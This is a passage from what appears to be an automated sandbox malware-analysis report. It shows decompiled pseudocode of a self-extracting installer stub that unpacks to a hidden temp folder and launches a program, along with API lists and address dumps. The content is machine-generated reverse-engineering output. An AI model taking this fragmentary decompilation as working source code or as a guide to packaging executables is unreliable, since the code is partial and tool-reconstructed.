                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0xe89a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00E84033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E84049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00E8405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E8409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E840A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00E840DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00E840E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: aa991c23a831e6ed6d7f824d1314177df588d393f7e0609da2a8c56a89182c64
                                                                                                                                                                                                        • Instruction ID: 192f727747d7a7d6a695ebbab4b45a9eea507744f996b5ba1fd4b2f66a25d17c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa991c23a831e6ed6d7f824d1314177df588d393f7e0609da2a8c56a89182c64
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9931A4B1641218AFEB21AB66DC4DFAB77BCEB94705F1411AAF50DF21A1C6304D89CB11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E00E82BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0xe8a288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0xe89124 = 0;
                                                                                                                                                                                                        				if(E00E82CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E00E82F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E00E852B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0xe88a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0xe89a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E00E81F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0xe88588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0xe89124; // 0x80070002
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00E86BB0,00E80000,00000000,00000002,0000000A), ref: 00E82C03
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00E86BB0,00E80000,00000000,00000002,0000000A), ref: 00E82C18
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00E82C28
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00E86BB0,00E80000,00000000,00000002,0000000A), ref: 00E82C98
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: 89d0027210ac462b4e51dbfd80abd3997c49f052828001f94588692bee37b948
                                                                                                                                                                                                        • Instruction ID: 5c4309c1b4efca2dde1b356980f47cb437e00b102ff80e25e360f432886a2cb1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89d0027210ac462b4e51dbfd80abd3997c49f052828001f94588692bee37b948
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A711C6716003059FD7207BF6AD88A7F779DAB44794B492029FB0DF3261DA30DC058761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E86F40() {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(E00E86EF0); // executed
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00E86F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: ef45653c6e6928131eb6560c31bb16224f0c03b1bc5298ff0e677faf5aad3e1b
                                                                                                                                                                                                        • Instruction ID: 99a98c906b71b17edd017798e10da870fc2872c5d1f2a71b90386665ef289831
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef45653c6e6928131eb6560c31bb16224f0c03b1bc5298ff0e677faf5aad3e1b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C99002B42622004BA6102B71DD1D42575915B4D602F8564B1A11DE4498DB6041445712
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph of function E00E855A0 (legend: Executed, Not Executed)
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00E855A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E00E8468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E00E8468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0xe89a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0xe88b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0xe88a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E00E86517(_t82, 0x7d2, 0, E00E83210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xe89a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0xe891e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0xe891e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E00E81781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E00E86952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E00E8597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
                                                                                                                                                                                                        																				_t50 = E00E82630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E00E8658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
                                                                                                                                                                                                        																					_t109 = 0xe891e4;
                                                                                                                                                                                                        																					E00E81781(0xe891e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E00E85467(0xe891e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E00E82630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E00E8597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E00E85467(0xe891e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0xe891e4;
                                                                                                                                                                                                        											_t70 = E00E82630(0, 0xe891e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0xe891e4;
                                                                                                                                                                                                        												_t71 = E00E85467(0xe891e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E00E8597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xe88b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E00E85467(0xe88b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E00E844B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E00E86CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8585e
                                                                                                                                                                                                        0x00e8585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8585e
                                                                                                                                                                                                        0x00e85811
                                                                                                                                                                                                        0x00e85817
                                                                                                                                                                                                        0x00e85819
                                                                                                                                                                                                        0x00e8581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8581f
                                                                                                                                                                                                        0x00e85791
                                                                                                                                                                                                        0x00e85797
                                                                                                                                                                                                        0x00e8579c
                                                                                                                                                                                                        0x00e8579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e857a0
                                                                                                                                                                                                        0x00e857a9
                                                                                                                                                                                                        0x00e857ae
                                                                                                                                                                                                        0x00e857b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e857b0
                                                                                                                                                                                                        0x00e8579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85769
                                                                                                                                                                                                        0x00e85762
                                                                                                                                                                                                        0x00e85753
                                                                                                                                                                                                        0x00e8574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85864
                                                                                                                                                                                                        0x00e85864
                                                                                                                                                                                                        0x00e85864
                                                                                                                                                                                                        0x00e85717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e856c3
                                                                                                                                                                                                        0x00e856c5
                                                                                                                                                                                                        0x00e856c9
                                                                                                                                                                                                        0x00e856ce
                                                                                                                                                                                                        0x00e856d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e856d6
                                                                                                                                                                                                        0x00e856d6
                                                                                                                                                                                                        0x00e856d8
                                                                                                                                                                                                        0x00e856dd
                                                                                                                                                                                                        0x00e856df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e856e1
                                                                                                                                                                                                        0x00e856e2
                                                                                                                                                                                                        0x00e856e4
                                                                                                                                                                                                        0x00e856e6
                                                                                                                                                                                                        0x00e856eb
                                                                                                                                                                                                        0x00e856ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e856f3
                                                                                                                                                                                                        0x00e856f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8586c
                                                                                                                                                                                                        0x00e85878
                                                                                                                                                                                                        0x00e8587e
                                                                                                                                                                                                        0x00e85882
                                                                                                                                                                                                        0x00e85883
                                                                                                                                                                                                        0x00e85889
                                                                                                                                                                                                        0x00e8588e
                                                                                                                                                                                                        0x00e8588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85896
                                                                                                                                                                                                        0x00e856ed
                                                                                                                                                                                                        0x00e856df
                                                                                                                                                                                                        0x00e856d0
                                                                                                                                                                                                        0x00e856c1
                                                                                                                                                                                                        0x00e856a8
                                                                                                                                                                                                        0x00e8565b
                                                                                                                                                                                                        0x00e8565b
                                                                                                                                                                                                        0x00e8565d
                                                                                                                                                                                                        0x00e85669
                                                                                                                                                                                                        0x00e85669
                                                                                                                                                                                                        0x00e8565f
                                                                                                                                                                                                        0x00e8565f
                                                                                                                                                                                                        0x00e85665
                                                                                                                                                                                                        0x00e85667
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85667
                                                                                                                                                                                                        0x00e8566c
                                                                                                                                                                                                        0x00e85673
                                                                                                                                                                                                        0x00e85678
                                                                                                                                                                                                        0x00e8567a
                                                                                                                                                                                                        0x00e8589b
                                                                                                                                                                                                        0x00e8589b
                                                                                                                                                                                                        0x00e85680
                                                                                                                                                                                                        0x00e85685
                                                                                                                                                                                                        0x00e8568c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8568c
                                                                                                                                                                                                        0x00e8567a
                                                                                                                                                                                                        0x00e8560e
                                                                                                                                                                                                        0x00e85613
                                                                                                                                                                                                        0x00e8561a
                                                                                                                                                                                                        0x00e85620
                                                                                                                                                                                                        0x00e85626
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85626
                                                                                                                                                                                                        0x00e855db
                                                                                                                                                                                                        0x00e855e0
                                                                                                                                                                                                        0x00e855e7
                                                                                                                                                                                                        0x00e855f1
                                                                                                                                                                                                        0x00e855f6
                                                                                                                                                                                                        0x00e855f6
                                                                                                                                                                                                        0x00e855f6
                                                                                                                                                                                                        0x00e858b7
                                                                                                                                                                                                        0x00e858c7

APIs
  • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
  • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
  • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
  • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
  • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
  • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
  • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00E855CF
• lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00E85638
• LocalFree.KERNEL32(00000000), ref: 00E8564C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E85620
  • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
  • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
